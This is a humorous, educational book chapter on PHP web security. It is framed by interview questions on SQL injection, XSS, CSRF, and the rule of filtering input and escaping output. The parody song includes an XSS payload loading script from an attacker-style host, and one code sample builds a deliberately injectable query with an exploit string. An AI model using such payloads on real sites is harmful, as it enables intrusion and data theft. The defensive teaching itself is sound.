Web Code (NaNoWriMo 2016)

Chapter. Filter Input-Escape Output: Security Principle and Practice

You give me your data
You give me your DDoS
You need it back pro rata
and you tell me what to toss

So I feel you deserve
the data throughput
take a look at my extension
and open filter_input()

I put my $_GET in a box for you
I put my $_POST in a box for you
I put my $_COOKIE in a box for you

I put my $_SERV'R in a box for you
I put my $_ENV in a box for you
I put my $_SESS'N in a box for you

There’s a global war on terror
but my globals never die
And phpBB might get you hacked
but my GETs are certified

You might like heaps protected
But, my buffers are so too
MySpace showed the world a worm
But my input is just for you

I put my $_GET in a box for you
I put my $_POST in a box for you
I put my $_COOKIE in a box for you

I put my $_SERV'R in a box for you
(It won’t treat_data)
I put my $_ENV in a box for you
(But it might pass secinfo)
I put my $_SESS'N in a box for you

You put your junk in a box
So there is one thing I could do
I’m putting finishing touches
on my data in a box for youuuuuu

I put my $_GET in a box for you
I put my $_POST in a box for you
I put my $_COOKIE in a box for you

One. Compile 5.2
Two. Choose a filter
Three. Set the filter.default
Four. Read the superglobal
Five. Admire your data

Forgery. (My data in a box)
Fixation. (My data in a box)
Injection. (My "> <script src="http://hacksh.it/data_box.js">)
Ajax. (My data in a box)

I put my $_SERV'R in a box for you
I put my $_ENV in a box for you
I put my $_SESS'N in a box for you

— adapted from “My Box in a Box” in honor of filter functions being added to PHP

For me to be discussing security may seem ironic given I once said, “Web security is a luxury, not a necessity. For any of you who think good coding, design aesthetic, or web security are important, I have only one word for you: MySpace.”

But one of the formulations of humor is in the interaction of realism and exaggeration, which the above note relies on.

The web security “track” was one of my more enjoyable sets of interview questions back when I worked at a social network. In this story, I’ll cover this track of questions, how I’d answer them, and how this applies to my understanding of PHP and web security.

(Be warned! These are not easy questions—with a small variation, I’d even get stuck easily. That is the nature/feature of security. One of my coworkers once sat in one of my interviews and afterward told me, “When you asked those security questions, I thought [the candidate] was actually going to cry.”)

Security Practice comes from principles

When people asked for a recommendation of a book on web security, I used to recommend Essential PHP Security by Chris Shiflett.

Why? Because it was impossibly small.

Web security is both really simple and an infinite mass of shit. If you start with the ad hoc approach, it will seem to be only the latter; but if you take the time to learn the building blocks that form the language of security principles, then it all starts to make sense and becomes the former.

By virtue of being small, a security guide must focus on the vocabulary and principles, without drowning you in detail. I want you to take the time to learn those things. If you don’t have the vocabulary then you can’t do web security.

To understand why, let’s take these interview questions:

Question: What is a SQL injection attack? Give me a simple example of how you do it.

SQL injection is when user input causes the execution of unwanted SQL on the database.

Most candidates get that part, but the second part trips about half of them. I think this is embarrassing because Randall Munroe would have no problem with it:
Exploits of a Mom—xkcd by Randall Munroe

The basic points I’m looking for are:

  • Have they ever thought like an attacker? If you can’t think like an attacker, you can’t think like a defender; if you can’t think up exploits, you can’t defend against exploits.
  • Did their answer have a basic escape sequence?
  • Did their answer inject data or a command?

Bonus points if they can explain why the xkcd exploit specifically doesn’t work in mysql on PHP. (Reason: mysql extension does not support multiple statements in a single query.)
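Here is a minimal sketch of the kind of answer I’m looking for. The users table and the build_login_query_unsafe() function are made up for illustration, and nothing here touches a database; it only shows what the SQL string looks like once the attacker’s input has been pasted into it.

```php
<?php
// Hypothetical, deliberately vulnerable query builder: user input is
// pasted straight into the SQL string.
function build_login_query_unsafe($name)
{
    return "SELECT * FROM users WHERE name = '" . $name . "'";
}

// Normal input produces the query the developer intended.
$normal = build_login_query_unsafe("alice");

// The attacker closes the string with a quote mark (the escape sequence),
// then appends their own SQL (the injected command).
$attack = build_login_query_unsafe("x' OR '1'='1");

echo $normal, "\n";
echo $attack, "\n";
```

The second query’s WHERE clause is now true for every row, which is all an attacker needs to start reading data that was never meant for them.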

Question: Name three ways to protect against SQL injection. For each way, explain where you’d place it in your code.

The key to answering this is to understand that the nature of the attack centers around the quote mark. So the solutions are to either remove the quote mark, escape the quote mark, or use a built-in feature to protect against the quote mark.

That is:

  1. You can filter out the quote mark. You would do this on input.
  2. You can escape the quote mark using something like mysql_real_escape_string(). You would do that just before outputting to (querying) the database.
  3. You can use a prepared query on the database, if your database and PHP extension support it (some didn’t until later; cf. mysqli_prepare).
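The three options above can be sketched side by side. This is an illustration under stated assumptions, not the way any particular site did it: it uses PDO with an in-memory SQLite database (so it assumes the pdo_sqlite extension is loaded) as a stand-in for MySQL, PDO::quote() plays the role of mysql_real_escape_string(), and the users table is invented.

```php
<?php
// Assumption: pdo_sqlite is available; SQLite stands in for MySQL here.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO users (name) VALUES ('alice'), ('bob')");

$input = "x' OR '1'='1";   // hostile input, as if read from $_GET

// 1. Filter on input: remove the quote mark before anything else sees it.
$filtered = str_replace("'", "", $input);

// 2. Escape on output: quote the value just before it goes into the query.
$escapedSql = "SELECT COUNT(*) FROM users WHERE name = " . $db->quote($input);
$escapedCount = (int) $db->query($escapedSql)->fetchColumn();

// 3. Prepared query: the SQL and the data travel separately.
$stmt = $db->prepare("SELECT COUNT(*) FROM users WHERE name = ?");
$stmt->execute([$input]);
$preparedCount = (int) $stmt->fetchColumn();

// For contrast, the unprotected query matches every row in the table.
$unsafeSql = "SELECT COUNT(*) FROM users WHERE name = '" . $input . "'";
$unsafeCount = (int) $db->query($unsafeSql)->fetchColumn();

echo "filtered: $filtered\n";
echo "escaped: $escapedCount, prepared: $preparedCount, unsafe: $unsafeCount\n";
```

Note where each one sits: the filter runs as the data comes in, while the escaping and the prepared query sit right at the database call.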

Almost every candidate can give at least one of the above, perhaps because they’ve been screened before I interviewed them. A decent number get all three with a little guidance!

Bonus points if they mention mysql_escape_string() and more if mysql_real_escape_string() and more if they explain the difference between these and escape().

Both the database and the extension must support prepared queries, otherwise the “prepared query” is just an abstracted version of escaping. (This is not the same. What if your database abstraction emulates a prepared query using escape()? Do you know the answer to that right this second? See why I hate database abstraction?)

However, while they can come up with filtering or escaping, almost no one in an interview explains the correct placement of this code. That’s because they think like hackers, not architects. The filter extension (mentioned in the song above) changes this since it forces filtering on the input. I’ve had a number of candidates argue with me about the correct placement of the filtering on input or the correct placement of the escaping on output. Many were competent Perl coders. By the end of this entry I hope you’ll understand why I’m right and they’re wrong (and perhaps why Perl coders self-select themselves to mess this question up). 😉

Question: Which protection against SQL injection is the right approach?

This is a trick question. My answer is that I’d do two things: filter on input and, on output, use prepared queries if possible or escaping if not (not both, obviously).

What I’m looking for is that there is no single best way (though clearly, I’ll give them some props if they mention that prepared queries are better than the others).

Why? That’s just good security!

Security is not an impenetrable wall. It sits on top of a mountain surrounded by a decently-sized wall, with a moat in front of it, and a healthy number of alert guards on the battlements.


Like an ogre, good web security has “layers.”  😛

I can go on for hours telling stories of people who haven’t understood this principle and paid the price. What you think is an unassailable fortress will fall like Dien Bien Phu to a clever attacker. In this case, if you chose just one security model, it’s easy to ask yourself how it would handle the following use cases:

  • What if the data field is a person’s name and he’s “Tim O’Reilly”?
  • What happens if at a later point, I decide to send the data somewhere (file, memcache, back to the user) before, or instead of, putting it in the database?
  • What if I migrate from MySQL to SQL Server, which has a different way of escaping?
    function mssql_escape_string($string) {
        // SQL Server escapes a single quote by doubling it
        return str_replace("'", "''", $string);
    }

  • What if I migrate to a data store that doesn’t support prepared queries?

Real-world software changes with business needs. Business needs change very often in the web world. Good software is flexible enough to change with it. (Exception: Ruby on Rails. In those cases, the problem isn’t the software, the problem clearly is you. If you don’t “get it,” then its creator, David Heinemeier Hansson, has “two words for you…” 😊)

The principle here is “If the security protocol isn’t too inconvenient, always implement it and put it as early as reasonably possible in the application flow.”

More on this later.

Question: How would you create a single security audit point for injection attacks?

I skip this question if a candidate has missed an earlier one.

My answer would be a Data Access pattern. If you are a framework guy, you’d use a persistence layer (like ActiveRecord) to abstract yourself entirely from the database because, apparently, LEFT JOINs are just too damn hard…

Given how many “web security” people have bombed this series in interviews, I’m inclined to start agreeing with that statement.
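To make the Data Access answer concrete, here is a small sketch. The UserGateway class, its method names, and the users table are all hypothetical, and it assumes PDO with the pdo_sqlite extension so it can run against an in-memory database. The point is only that every query lives in one class, so that class is the one place you audit for injection.

```php
<?php
// Hypothetical data access class: every query in the application goes
// through here, so this is the single audit point for SQL injection.
class UserGateway
{
    private $db;

    public function __construct(PDO $db)
    {
        $this->db = $db;
    }

    public function add($name)
    {
        $stmt = $this->db->prepare("INSERT INTO users (name) VALUES (?)");
        $stmt->execute([$name]);
    }

    public function findByName($name)
    {
        $stmt = $this->db->prepare("SELECT id, name FROM users WHERE name = ?");
        $stmt->execute([$name]);
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    }
}

// Assumption: pdo_sqlite is available; SQLite stands in for the real database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)");

$users = new UserGateway($db);
$users->add("Tim O'Reilly");                      // a legitimate quote mark survives
$found  = $users->findByName("Tim O'Reilly");     // one row
$attack = $users->findByName("x' OR '1'='1");     // no rows
```

If the rest of the code never builds SQL strings itself, a reviewer only has to read this one class, and a migration to a different data store only has to change it.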

Question: What is Cross-Site Scripting (XSS)? Cross Site Request Forgery (CSRF)? the Session Fixation attack? Describe an example of how you would implement the attack (and how to defend against it in your code)

Again, the reason for the last part is to give the candidate an opportunity to apply this stuff in practice. To think concretely like an attacker shows real knowledge beyond the simple theory. Again, if you don’t understand the attack, you can’t defend against it. Again, these principles come from the practice.

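In brief: XSS is when an attacker gets their own script into a page that your site serves to other users. CSRF (also written XSRF) is when another site causes a logged-in user’s browser to make a request to your site that the user never intended. Session fixation is when an attacker gets a victim to use a session identifier the attacker already knows, then waits for the victim to log in with it.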

I’ll confess that the only reason that I ask about session fixation is because, once in a while, I meet a candidate who can define XSS and CSRF easily, and Sadistic Me wants to see if I can break them. Session fixation is the web security equivalent of asking people how to laugh in hexadecimal. It’s an obscure vulnerability easily-corrected and known by us old-timers. This makes it a fun one to lord over people. (How to laugh in hex: 48 41 48 41.)

CSRF is certainly important when building an API for use in Ajax. But I’ll continue with XSS (what it is, how to do it, how to protect against it) to hook off of later in this series.

Question: Explain how the MySpace worm works? Give an example of using CSRF to determine login state on a remote site?

I don’t ask these questions normally. But some of the more belligerent candidates bitch about the previous series as being “just terminology.” Basically this dismissal is the security/interview equivalent of “I’m not really into Pokémon.”

Really, do they think I ask these questions for fun?

If you can’t answer the above two questions, figure them out on your own. Working out the answers is how you develop a zen-like ability to size up security vulnerabilities quickly and to build security practice out of these simple security principles (in this case, what to combine and how: XSS, CSRF, and JavaScript exception handling).

(Aside: When I saw Chris Shiflett’s second tweet ever, I was really pissed. He found the same vulnerability in Twitter as I did. I had been sitting on that vulnerability for months and was going to pass the time one day by writing a twitter worm.)

Question: What does “filter input-escape output” mean? Give an example of filtering? Give an example of escaping?

Filter input-escape output is a best practice, not a design pattern!

Here is Wikipedia’s definition, but put simply it is the principle that all filtering should be done on the input to the application server and all escaping should be done on the output from the application server.

The problem is, even if people can intuit that or have heard of it (surprisingly few candidates have, but most can guess), many haven’t thought about what filtering is and what escaping is. But that’s why I asked the other questions: they already have what they need to answer this!

Taking the two examples above (SQL injection and XSS) and applying this principle:

  • To filter SQL injection, you strip out the quote mark or cast the input as an integer (if you are expecting integers), etc.
  • To filter XSS attacks, you use strip_tags(), regular expressions, or a combination of html tidy normalization and a DOM walker that implements a white-list or black-list filter. This filters out the <script> tags as well as injections into CSS—you may need a CSS parser there unless you strip out all style attributes and <style> tags.
  • To escape SQL injection, you use something like mysql_real_escape_string() or prepared queries.
  • To escape XSS attacks, you use htmlspecialchars() or htmlentities(). Both will do things like replace < with &lt; but htmlentities does a bit more which is fine if you are expecting it to be HTML and not XML.
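The four bullets above can be sketched in a few lines. The helper names (filter_id, filter_plain_text, escape_html) are made up for this example; the built-in calls are standard PHP. I use filter_var() rather than filter_input() only so the sketch runs from the command line, where there is no request to read from.

```php
<?php
// Filtering changes or rejects the data itself. It belongs on input.
function filter_id($raw)
{
    // Returns an int, or null if the input is not an integer at all.
    $id = filter_var($raw, FILTER_VALIDATE_INT);
    return $id === false ? null : $id;
}

function filter_plain_text($raw)
{
    // Strong filter for fields that should never contain markup.
    // strip_tags() removes the tags but keeps the text between them.
    return strip_tags($raw);
}

// Escaping keeps the data intact but encodes it for one destination.
function escape_html($text)
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

$id       = filter_id("42");                       // 42
$badId    = filter_id("42; DROP TABLE users");     // null
$stripped = filter_plain_text('Hi <script>alert(1)</script>there');
$escaped  = escape_html('<b>Tim O\'Reilly</b>');

echo $stripped, "\n";   // Hi alert(1)there
echo $escaped, "\n";    // &lt;b&gt;Tim O&#039;Reilly&lt;/b&gt;
```

Notice that the filter throws information away (the tags are gone for good), while the escaped string can still be turned back into the original. That is the difference to keep in your head.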

(It might have helped if we had called it “encoding” instead of “escaping.” But we don’t, so deal.)

And from this example, the rest follows.

  • You want to filter on the input, because of the practice of putting as much security as possible as early as possible in the application. The input is as early as you can get. This way all the stuff downstream of the input gets the benefit of this protection.
  • Note that some candidates misinterpret “filter input” as putting it in client side code. That’s easily bypassed by the simplest script kiddie scripts/spam bots. They forget that they’re wearing their PHP developer hat, not a front end developer one: we are talking input into the PHP application not the output of the web browser—though it can’t hurt to put it there too.
  • You have to escape on output because escaping functions are going to be different depending on where the data goes. If it goes to the MySQL database, you use mysql_real_escape_string(), which generates something slightly different from what you need when sending the data as an argument on the command line (escapeshellarg()), which is different again from what you need when outputting back to the user (htmlentities()). (Certainly you have already seen that XSS escaping looks totally different than SQL escaping!)
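To see why escaping can only happen on output, take one value and send it to three destinations. This is a sketch; the sample value is invented, and json_encode() is my stand-in for an Ajax payload. The exact result of escapeshellarg() depends on the platform, so I don’t show it.

```php
<?php
$name = "Tim O'Reilly <tim@example.com>";

// Same data, three destinations, three different encodings.
$forHtml  = htmlspecialchars($name, ENT_QUOTES, 'UTF-8'); // back to the browser
$forShell = escapeshellarg($name);                        // command-line argument
$forJson  = json_encode($name);                           // Ajax payload

echo $forHtml, "\n";   // Tim O&#039;Reilly &lt;tim@example.com&gt;
echo $forJson, "\n";   // "Tim O'Reilly <tim@example.com>"
```

No single encoding is safe for all three, which means you cannot pick one at input time without guessing where the data will end up.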

And the principles apply again and again to XSS as they did to SQL injection.

  • What if I want the HTML to be outputted as HTML because I run a MySpace-like site with HTML editing and customization? You can’t implement any escaping, but you still have the filtering. And you’ve done that filtering on input, right?
  • When you know it isn’t HTML, you should always escape against HTML strings on output to the template. And you also have the freedom of strongly filtering on input by using strip_tags(). This way, you are protected against XSS injection back to the user. XSS forms the basis of many forms of session hijacking and XSRF worms, so that’s a good thing.
  • Therefore, you apply both security rules because no one is going to have complete coverage. And because you don’t want security to be an impenetrable wall, right?

And this leads to further understanding of the concept of “input” and “output.” Input doesn’t mean “input from the user’s browser” it means “input into the application server” and “output” doesn’t mean “output to the returned HTML” it means “output from the application server to any external source.”

PHP still does what it does best (act as glue code) but with the hard-won security principles tacked on. In the old days, this meant gluing the user to a database back end and back, but on a modern website, this means so much more. We’ve gone well beyond a “3-tier architecture” or even “n-tier” to a complex architecture of highly cohesive external services with simple, standard interfaces, one of which is the user of the website via HTML (the others include the user via Ajax payload; 3rd-party APIs in XML REST, JSON, SOAP, XML-RPC, or binary protocols; memcache; the database; the command line; SMTP/sendmail; back-end business objects; TCP; UDP; or direct calls via SWIG or extension or whatever).

From principle to practice

I’ll give you an example of how I applied the above principle of “filter input, escape output” when working at a social network. Because they were a MySpace-like social network, we had to allow most HTML input and thus base our input filtering of certain fields on a blacklist of illegal tags, properties, and URLs instead of a whitelist of allowed tags (the more common approach in the libraries out there). I knew I could not “build an impenetrable wall” with a blacklist: the spec is always changing and there is an “infinite mass of shit” in security. I also needed a system flexible enough to follow business needs (in other words, I had to be able to poke very selective holes in my security model based on business needs).

So instead, I did what I had time to do (write a custom html input filter), and then applied the principle of filter input-escape output to the system architecture. But not just with a kick-ass user input filter (filter input); not on user output (remember, I can’t escape the HTML in this case); not just on escaping to the database (via stored procedure to Oracle); but also on input from the database and memcache stores.

In other words, I encoded the version number of the HTML input filter on output to the database and to memcache, so on input, I could check to see if it was out of date and run the html filter again! Why?

Because I knew that one day we would be hacked. And one day we were. Within hours, an XSS worm injected into the style tags of the widgets on our site had “infected” 60,000 user profiles. Even if we stopped it on user input, we would still have had those 60,000 profiles to deal with, scattered across all the databases in the federation containing 50 million user profiles. Cleaning up that mess would have taken days!

Instead, I asked for a copy of the exploit, figured out the nature of the attack (an injection involving running executable javascript from CSS), added a CSS parser (which I had lying around because I knew about this attack, but I was too lazy to look up its exact nature), hooked it up to the html filtering object and bumped the version number.

All new uploaded content was filtered against it. And as users used the site, they were fixing existing corrupted HTML snippets in the site’s memcache. Then, at our leisure, we could test the new filter against regressions and slowly remove the attack permanently from the database. All using the same code and all because of the principle:

Filter input, escape output. Know the difference between filtering and escaping. And we mean all inputs and all outputs.

And I did this without building an “impenetrable wall,” but a series of barriers, moats, and what not—every input an opportunity to filter, every output an opportunity to escape, the flexibility to deal with breaches designed in the architecture.
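The version-stamping trick described above can be sketched like this. Everything named here is hypothetical: the HtmlFilter class is a toy stand-in for the real filter, the version numbers are invented, and a plain PHP array plays the part of memcache and the database.

```php
<?php
// Hypothetical stand-in for the custom HTML filter. Bumping VERSION marks
// everything stored under an older version as needing a re-filter.
class HtmlFilter
{
    const VERSION = 2;

    public static function clean($html)
    {
        // Assumed history: version 1 removed <script> blocks; version 2
        // also removes <style> blocks. A real filter does far more.
        $html = preg_replace('#<script\b.*?</script>#is', '', $html);
        $html = preg_replace('#<style\b.*?</style>#is', '', $html);
        return $html;
    }
}

// Output to the store: stamp the record with the filter version.
function store_profile(array &$store, $key, $html)
{
    $store[$key] = ['v' => HtmlFilter::VERSION, 'html' => HtmlFilter::clean($html)];
}

// Input from the store: anything stamped with an old version is
// re-filtered and written back before it is used.
function load_profile(array &$store, $key)
{
    $record = $store[$key];
    if ($record['v'] < HtmlFilter::VERSION) {
        store_profile($store, $key, $record['html']);
        $record = $store[$key];
    }
    return $record['html'];
}

// A record written under the old filter, still carrying the exploit.
$store = ['user:1' => ['v' => 1, 'html' => '<p>hi</p><style>evil</style>']];
$html = load_profile($store, 'user:1');

echo $html, "\n";   // <p>hi</p>
```

The store is treated as just another input. Old records heal themselves the first time anyone reads them, and the only deploy needed is the new filter with a bumped version number.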


Layers. Like an ogre!

Instead of panicking or a massive site outage, two hours later, I was headed to a Y Combinator Christmas party and getting royally wasted.

Question: What are “Magic Quotes” and why is it bad?

This is the gravy. Many a PHP developer knows, “Magic Quotes are bad.” But did you know that they’re monotonically bad? (For instance, a case can be made for keeping register_globals, but none can be made for magic_quotes.)

And can you answer this question this simply?

“Magic Quotes are bad because they escape input, and you should filter input, escape output!”

Now you can!

Hard experience has taught people developing large PHP sites that you should escape only on output. Any old hand who has written PHP code that is deployed at scale or on a variety of hosted services knows the nightmare that is magic_quotes. Heck, the WordPress codebase at a low level STILL has escaped code stored in certain data fields because of the assumption of magic_quotes. (Sure, you could escape on input, but you would have to know which escapes were applied and carry that with the variable as metadata, most commonly by changing the variable name. It gets ugly very quickly.)
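Here is a small sketch of what that nightmare looks like. magic_quotes_gpc itself was removed in PHP 5.4, so the example calls addslashes() on the way in, which is what the setting did to request variables. The sample name is invented.

```php
<?php
// Escaping on input, the way magic_quotes_gpc did it.
$raw = "Tim O'Reilly";
$magicQuoted = addslashes($raw);          // escaped for a database, sight unseen

// The value turns out to be headed for an HTML template instead.
$html = htmlspecialchars($magicQuoted, ENT_QUOTES, 'UTF-8');
// The stray backslash is now part of what the user sees.

// Escaping on output instead: the raw value is kept, and each
// destination applies its own encoding at the last moment.
$htmlCorrect = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');

echo $html, "\n";          // Tim O\&#039;Reilly
echo $htmlCorrect, "\n";   // Tim O&#039;Reilly
```

Once the backslash has been stored, every later reader of that field has to know it is there and strip it, which is exactly the metadata problem described above.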

Put simply:

magic_quotes has the implicit assumption that the output of all input is a mysql/postgres database or command line and the attacker is not that clever.

Which brings us full circle to the Perl developer who continued to argue with me that I can (and should) escape the input. Perl is “311 code”: chmod 311 *.pl (writer can write and execute, the company and the world can execute, nobody can read it)! One consequence of Perl’s TIMTOWTDI philosophy is that the Perl coder simply isn’t used to the concept that their code will be broken into parts and edited by a team of people.

While PHP code may have had its origins in “Rasmus wants to build his Personal Home Page and he wants a template tool to do it,” it now has to power large scale, complex websites such as Facebook, Yahoo, Wikipedia, and WordPress.

Code has become complex. magic_quotes made sense when we were naïve about inputs and outputs (input meant from the user and output meant to a mysql database); magic_quotes made sense when we didn’t really understand the difference between filtering and escaping.

But many PHP developers spent many years trying to pull things like magic_quotes out of the system and out of the wreckage of their code, through many late-night debugging sessions and broken Sourceforge PHP application installs.

Are you going to learn from their experiences, or are you going to doom yourself to repeat them?

And that is the nature of security:

Practice creates good principles. Those principles make for good practice.

Now we’re done

And after this, can you see why I had a low tolerance for poor candidates in “web security”? Do they really want websites to fall flat on their asses and to be poorly-architected, vulnerable piles?

I actually want your website to stay online. I want you to be able to enjoy your Christmas party without fear of being “on call” for a late-night security patch session.

Let’s return to the joke that “Security is a luxury” that touched off this story.

Before one interview, a candidate’s resume listed web security under skills. Of course they got this battery of questions from me, and, as luck would have it, it was especially egregious (the aforementioned one where my colleague thought I was going to make him cry).

I was about to move on but the candidate, clearly frustrated by this experience, said to me, “Look, if you give me a website, I can make it secure.”

I was crestfallen—the person didn’t know what a SQL injection attack was! Then, I realized, “Wow! He’s right! Shit. I can make a web server unhackable too: just disconnect it from the internet.”

So I suppose that’s as good a tip as any:

If you absolutely have to make your website secure, go to the colo and pull out all your ethernet cables.


Part III. Ri: Musings and Mistakes

This section is dedicated to mom